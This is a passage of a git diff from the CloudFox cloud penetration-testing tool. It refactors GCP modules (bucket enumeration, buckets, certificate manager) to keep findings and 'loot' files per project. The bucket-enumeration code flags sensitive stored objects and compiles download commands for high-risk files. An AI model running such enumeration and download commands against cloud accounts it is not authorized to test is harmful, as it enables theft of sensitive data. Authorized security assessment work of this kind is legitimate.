nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } output := BigtableOutput{ - Table: tables, + Table: tableFiles, Loot: lootFiles, } diff --git a/gcp/commands/bucketenum.go b/gcp/commands/bucketenum.go index 459383e2..cbc13922 100644 --- a/gcp/commands/bucketenum.go +++ b/gcp/commands/bucketenum.go @@ -50,9 +50,9 @@ func init() { type BucketEnumModule struct { gcpinternal.BaseGCPModule - SensitiveFiles []bucketenumservice.SensitiveFileInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectSensitiveFiles map[string][]bucketenumservice.SensitiveFileInfo // projectID -> files + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type BucketEnumOutput struct { @@ -70,11 +70,10 @@ func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { } module := &BucketEnumModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - SensitiveFiles: []bucketenumservice.SensitiveFileInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSensitiveFiles: make(map[string][]bucketenumservice.SensitiveFileInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -82,7 +81,8 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (max %d objects per bucket)...", bucketEnumMaxObjects), globals.GCP_BUCKETENUM_MODULE_NAME) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) - if len(m.SensitiveFiles) == 0 { + allFiles := m.getAllSensitiveFiles() + if len(allFiles) == 0 { logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) return } @@ -90,7 +90,7 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) // Count by risk level criticalCount := 0 highCount := 0 - for _, file := range m.SensitiveFiles { + for _, file := range allFiles { switch file.RiskLevel { case "CRITICAL": criticalCount++ @@ -100,10 +100,18 @@ func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", - len(m.SensitiveFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) + len(allFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *BucketEnumModule) getAllSensitiveFiles() []bucketenumservice.SensitiveFileInfo { + var all []bucketenumservice.SensitiveFileInfo + for _, files := range m.ProjectSensitiveFiles { + all = append(all, files...) + } + return all +} + func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Scanning buckets in project: %s", projectID), globals.GCP_BUCKETENUM_MODULE_NAME) @@ -111,6 +119,21 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, svc := bucketenumservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bucket-enum-sensitive-commands"] = &internal.LootFile{ + Name: "bucket-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["bucket-enum-commands"] = &internal.LootFile{ + Name: "bucket-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // Get list of buckets buckets, err := svc.GetBucketsList(projectID) if err != nil { @@ -125,6 +148,7 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, } // Scan each bucket + var projectFiles []bucketenumservice.SensitiveFileInfo for _, bucketName := range buckets { files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) if err != nil { @@ -133,42 +157,21 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) continue } - - m.mu.Lock() - m.SensitiveFiles = append(m.SensitiveFiles, files...) - for _, file := range files { - m.addFileToLoot(file) - } - m.mu.Unlock() + projectFiles = append(projectFiles, files...) } -} -func (m *BucketEnumModule) initializeLootFiles() { - m.LootMap["bucket-enum-sensitive-commands"] = &internal.LootFile{ - Name: "bucket-enum-sensitive-commands", - Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["bucket-enum-commands"] = &internal.LootFile{ - Name: "bucket-enum-commands", - Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.mu.Lock() + m.ProjectSensitiveFiles[projectID] = projectFiles + for _, file := range projectFiles { + m.addFileToLoot(projectID, file) } + m.mu.Unlock() } -func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInfo) { +func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservice.SensitiveFileInfo) { // All files go to the general commands file - m.LootMap["bucket-enum-commands"].Contents += fmt.Sprintf( - "# [%s] %s - gs://%s/%s\n"+ - "# Category: %s, Size: %d bytes\n"+ - "%s\n\n", - file.RiskLevel, file.Category, - file.BucketName, file.ObjectName, - file.Description, file.Size, - file.DownloadCmd, - ) - - // CRITICAL and HIGH risk files also go to the sensitive commands file - if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { - m.LootMap["bucket-enum-sensitive-commands"].Contents += fmt.Sprintf( + if lootFile := m.LootMap[projectID]["bucket-enum-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( "# [%s] %s - gs://%s/%s\n"+ "# Category: %s, Size: %d bytes\n"+ "%s\n\n", @@ -178,28 +181,46 @@ func (m *BucketEnumModule) addFileToLoot(file bucketenumservice.SensitiveFileInf file.DownloadCmd, ) } + + // CRITICAL and HIGH risk files also go to the sensitive commands file + if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { + if lootFile := m.LootMap[projectID]["bucket-enum-sensitive-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - gs://%s/%s\n"+ + "# Category: %s, Size: %d bytes\n"+ + "%s\n\n", + file.RiskLevel, file.Category, + file.BucketName, file.ObjectName, + file.Description, file.Size, + file.DownloadCmd, + ) + } + } } func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { - // All files table - header := []string{ - "Project ID", - "Project Name", - "Bucket", - "Object Name", - "Category", - "Size", - "Public", - "Description", + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) } +} + +func (m *BucketEnumModule) getFilesHeader() []string { + return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Category", "Size", "Public", "Description"} +} + +func (m *BucketEnumModule) getSensitiveFilesHeader() []string { + return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Category", "Size", "Public"} +} +func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { var body [][]string - for _, file := range m.SensitiveFiles { + for _, file := range files { publicStatus := "No" if file.IsPublic { publicStatus = "Yes" } - body = append(body, []string{ file.ProjectID, m.GetProjectName(file.ProjectID), @@ -211,27 +232,18 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg file.Description, }) } + return body +} - // Critical/High risk files table (sensitive files) - sensitiveHeader := []string{ - "Project ID", - "Project Name", - "Bucket", - "Object Name", - "Category", - "Size", - "Public", - } - - var sensitiveBody [][]string - for _, file := range m.SensitiveFiles { +func (m *BucketEnumModule) sensitiveFilesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { + var body [][]string + for _, file := range files { if file.RiskLevel == "CRITICAL" || file.RiskLevel == "HIGH" { publicStatus := "No" if file.IsPublic { publicStatus = "Yes" } - - sensitiveBody = append(sensitiveBody, []string{ + body = append(body, []string{ file.ProjectID, m.GetProjectName(file.ProjectID), file.BucketName, @@ -242,30 +254,92 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg }) } } + return body +} + +func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + files := m.ProjectSensitiveFiles[projectID] + if len(files) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bucket-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(files), + }) + + sensitiveBody := m.sensitiveFilesToTableBody(files) + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + } + } - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + return tableFiles +} + +func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectSensitiveFiles { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = BucketEnumOutput{Table: tableFiles, Loot: lootFiles} } - tables := []internal.TableFile{ - { - Name: "bucket-enum", - Header: header, - Body: body, - }, + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) } +} - if len(sensitiveBody) > 0 { +func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFiles := m.getAllSensitiveFiles() + + var tables []internal.TableFile + + if len(allFiles) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum-sensitive", - Header: sensitiveHeader, - Body: sensitiveBody, + Name: "bucket-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(allFiles), }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + + sensitiveBody := m.sensitiveFilesToTableBody(allFiles) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + } + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := BucketEnumOutput{Table: tables, Loot: lootFiles} @@ -275,18 +349,8 @@ func (m *BucketEnumModule) writeOutput(ctx context.Context, logger internal.Logg scopeNames[i] = m.GetProjectName(id) } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETENUM_MODULE_NAME) } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index 46dbd055..3bbc8229 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -45,10 +45,10 @@ Security Columns: type BucketsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Buckets []CloudStorageService.BucketInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Module-specific fields - per-project for hierarchical output + ProjectBuckets map[string][]CloudStorageService.BucketInfo // projectID -> buckets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -74,14 +74,11 @@ func runGCPBucketsCommand(cmd *cobra.Command, args []string) { // Create module instance module := &BucketsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Buckets: []CloudStorageService.BucketInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectBuckets: make(map[string][]CloudStorageService.BucketInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -93,30 +90,40 @@ func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) - // Check results - if len(m.Buckets) == 0 { + // Get all buckets for stats + allBuckets := m.getAllBuckets() + if len(allBuckets) == 0 { logger.InfoM("No buckets found", globals.GCP_BUCKETS_MODULE_NAME) return } // Count public buckets for summary publicCount := 0 - for _, bucket := range m.Buckets { + for _, bucket := range allBuckets { if bucket.IsPublic { publicCount++ } } if publicCount > 0 { - logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(m.Buckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(allBuckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) } else { - logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(m.Buckets)), globals.GCP_BUCKETS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(allBuckets)), globals.GCP_BUCKETS_MODULE_NAME) } // Write output m.writeOutput(ctx, logger) } +// getAllBuckets returns all buckets from all projects (for statistics) +func (m *BucketsModule) getAllBuckets() []CloudStorageService.BucketInfo { + var all []CloudStorageService.BucketInfo + for _, buckets := range m.ProjectBuckets { + all = append(all, buckets...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -135,13 +142,22 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo return } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Buckets = append(m.Buckets, buckets...) + m.ProjectBuckets[projectID] = buckets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["buckets-commands"] = &internal.LootFile{ + Name: "buckets-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for each bucket for _, bucket := range buckets { - m.addBucketToLoot(bucket) + m.addBucketToLoot(projectID, bucket) } m.mu.Unlock() @@ -153,16 +169,14 @@ func (m *BucketsModule) processProject(ctx context.Context, projectID string, lo // ------------------------------ // Loot File Management // ------------------------------ -func (m *BucketsModule) initializeLootFiles() { - m.LootMap["buckets-commands"] = &internal.LootFile{ - Name: "buckets-commands", - Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *BucketsModule) addBucketToLoot(projectID string, bucket CloudStorageService.BucketInfo) { + lootFile := m.LootMap[projectID]["buckets-commands"] + if lootFile == nil { + return } -} -func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { // All commands for this bucket - m.LootMap["buckets-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Bucket: gs://%s (Project: %s, Location: %s)\n"+ "# Describe bucket:\n"+ "gcloud storage buckets describe gs://%s --project=%s\n"+ @@ -233,8 +247,131 @@ func getMemberType(member string) string { // Output Generation // ------------------------------ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Combined table with IAM columns (one row per IAM member) - header := []string{ + // Log findings first + allBuckets := m.getAllBuckets() + publicCount := 0 + for _, bucket := range allBuckets { + if bucket.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *BucketsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, buckets := range m.ProjectBuckets { + body := m.bucketsToTableBody(buckets) + tables := []internal.TableFile{{ + Name: globals.GCP_BUCKETS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BucketsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BucketsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allBuckets := m.getAllBuckets() + body := m.bucketsToTableBody(allBuckets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_BUCKETS_MODULE_NAME, + Header: header, + Body: body, + }} + + output := BucketsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames (display names) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the buckets table header +func (m *BucketsModule) getTableHeader() []string { + return []string{ "Project ID", "Project Name", "Name", @@ -243,19 +380,20 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) "Versioning", "Uniform Access", "Encryption", - "Role", - "Member Type", - "Member", + "Resource Role", + "Principal Type", + "Resource Principal", } +} +// bucketsToTableBody converts buckets to table body rows +func (m *BucketsModule) bucketsToTableBody(buckets []CloudStorageService.BucketInfo) [][]string { var body [][]string - publicCount := 0 - for _, bucket := range m.Buckets { + for _, bucket := range buckets { // Format public access publicDisplay := "" if bucket.IsPublic { publicDisplay = bucket.PublicAccess - publicCount++ } // One row per IAM member @@ -295,54 +433,5 @@ func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) }) } } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{ - { - Name: globals.GCP_BUCKETS_MODULE_NAME, - Header: header, - Body: body, - }, - } - - if publicCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible bucket(s)!", publicCount), globals.GCP_BUCKETS_MODULE_NAME) - } - - output := BucketsOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - // Build scope names from project names map - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - // Write output using HandleOutputSmart with scope support - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames (display names) - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) - m.CommandCounter.Error++ - } + return body } diff --git a/gcp/commands/certmanager.go b/gcp/commands/certmanager.go index 51e25291..1f57fb5d 100644 --- a/gcp/commands/certmanager.go +++ b/gcp/commands/certmanager.go @@ -46,11 +46,11 @@ What this module finds: type CertManagerModule struct { gcpinternal.BaseGCPModule - Certificates []certmanagerservice.Certificate - SSLCertificates []certmanagerservice.SSLCertificate - CertMaps []certmanagerservice.CertificateMap - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectCertificates map[string][]certmanagerservice.Certificate // projectID -> certificates + ProjectSSLCertificates map[string][]certmanagerservice.SSLCertificate // projectID -> SSL certs + ProjectCertMaps map[string][]certmanagerservice.CertificateMap // projectID -> cert maps + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -74,14 +74,12 @@ func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { } module := &CertManagerModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Certificates: []certmanagerservice.Certificate{}, - SSLCertificates: []certmanagerservice.SSLCertificate{}, - CertMaps: []certmanagerservice.CertificateMap{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectCertificates: make(map[string][]certmanagerservice.Certificate), + ProjectSSLCertificates: make(map[string][]certmanagerservice.SSLCertificate), + ProjectCertMaps: make(map[string][]certmanagerservice.CertificateMap), + LootMap: make(map[string]map[string]*internal.LootFile), } - - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -91,7 +89,11 @@ func runGCPCertManagerCommand(cmd *cobra.Command, args []string) { func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CERTMANAGER_MODULE_NAME, m.processProject) - totalCerts := len(m.Certificates) + len(m.SSLCertificates) + allCerts := m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + totalCerts := len(allCerts) + len(allSSLCerts) if totalCerts == 0 { logger.InfoM("No certificates found", globals.GCP_CERTMANAGER_MODULE_NAME) @@ -102,14 +104,14 @@ func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) expiringCount := 0 expiredCount := 0 - for _, cert := range m.Certificates { + for _, cert := range allCerts { if cert.DaysUntilExpiry < 0 { expiredCount++ } else if cert.DaysUntilExpiry <= 30 { expiringCount++ } } - for _, cert := range m.SSLCertificates { + for _, cert := range allSSLCerts { if cert.DaysUntilExpiry < 0 { expiredCount++ } else if cert.DaysUntilExpiry <= 30 { @@ -118,7 +120,7 @@ func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Found %d certificate(s), %d map(s)", - totalCerts, len(m.CertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) + totalCerts, len(allCertMaps)), globals.GCP_CERTMANAGER_MODULE_NAME) if expiredCount > 0 { logger.InfoM(fmt.Sprintf("[HIGH] %d certificate(s) have EXPIRED!", expiredCount), globals.GCP_CERTMANAGER_MODULE_NAME) @@ -130,6 +132,30 @@ func (m *CertManagerModule) Execute(ctx context.Context, logger internal.Logger) m.writeOutput(ctx, logger) } +func (m *CertManagerModule) getAllCertificates() []certmanagerservice.Certificate { + var all []certmanagerservice.Certificate + for _, certs := range m.ProjectCertificates { + all = append(all, certs...) + } + return all +} + +func (m *CertManagerModule) getAllSSLCertificates() []certmanagerservice.SSLCertificate { + var all []certmanagerservice.SSLCertificate + for _, certs := range m.ProjectSSLCertificates { + all = append(all, certs...) + } + return all +} + +func (m *CertManagerModule) getAllCertMaps() []certmanagerservice.CertificateMap { + var all []certmanagerservice.CertificateMap + for _, maps := range m.ProjectCertMaps { + all = append(all, maps...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -140,6 +166,17 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string svc := certmanagerservice.New() + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["certmanager-details"] = &internal.LootFile{ + Name: "certmanager-details", + Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + // Get Certificate Manager certs certs, err := svc.GetCertificates(projectID) if err != nil { @@ -165,15 +202,15 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.Certificates = append(m.Certificates, certs...) - m.SSLCertificates = append(m.SSLCertificates, sslCerts...) - m.CertMaps = append(m.CertMaps, certMaps...) + m.ProjectCertificates[projectID] = certs + m.ProjectSSLCertificates[projectID] = sslCerts + m.ProjectCertMaps[projectID] = certMaps for _, cert := range certs { - m.addCertToLoot(cert) + m.addCertToLoot(projectID, cert) } for _, cert := range sslCerts { - m.addSSLCertToLoot(cert) + m.addSSLCertToLoot(projectID, cert) } m.mu.Unlock() } @@ -181,14 +218,11 @@ func (m *CertManagerModule) processProject(ctx context.Context, projectID string // ------------------------------ // Loot File Management // ------------------------------ -func (m *CertManagerModule) initializeLootFiles() { - m.LootMap["certmanager-details"] = &internal.LootFile{ - Name: "certmanager-details", - Contents: "# Certificate Manager Details\n# Generated by CloudFox\n\n", +func (m *CertManagerModule) addCertToLoot(projectID string, cert certmanagerservice.Certificate) { + lootFile := m.LootMap[projectID]["certmanager-details"] + if lootFile == nil { + return } -} - -func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { // Build flags for special attributes var flags []string if cert.Wildcard { @@ -208,7 +242,7 @@ func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { flagStr = " [" + strings.Join(flags, "] [") + "]" } - m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s%s\n"+ "Project: %s | Location: %s\n"+ "Type: %s | State: %s\n"+ @@ -222,7 +256,11 @@ func (m *CertManagerModule) addCertToLoot(cert certmanagerservice.Certificate) { ) } -func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertificate) { +func (m *CertManagerModule) addSSLCertToLoot(projectID string, cert certmanagerservice.SSLCertificate) { + lootFile := m.LootMap[projectID]["certmanager-details"] + if lootFile == nil { + return + } // Build flags for special attributes var flags []string if cert.Wildcard { @@ -242,7 +280,7 @@ func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertific flagStr = " [" + strings.Join(flags, "] [") + "]" } - m.LootMap["certmanager-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (SSL Certificate)%s\n"+ "Project: %s | Type: %s\n"+ "Domains: %s\n"+ @@ -258,13 +296,25 @@ func (m *CertManagerModule) addSSLCertToLoot(cert certmanagerservice.SSLCertific // Output Generation // ------------------------------ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CertManagerModule) getCertificatesHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} +} - // Combined certificates table - header := []string{"Project Name", "Project ID", "Name", "Type", "Domains", "Expires", "Days Left", "Wildcard", "Expired", "Self-Managed"} +func (m *CertManagerModule) getCertMapsHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} +} + +func (m *CertManagerModule) certsToTableBody(certs []certmanagerservice.Certificate, sslCerts []certmanagerservice.SSLCertificate) [][]string { var body [][]string - for _, cert := range m.Certificates { + for _, cert := range certs { wildcard := "No" if cert.Wildcard { wildcard = "Yes" @@ -292,7 +342,7 @@ func (m 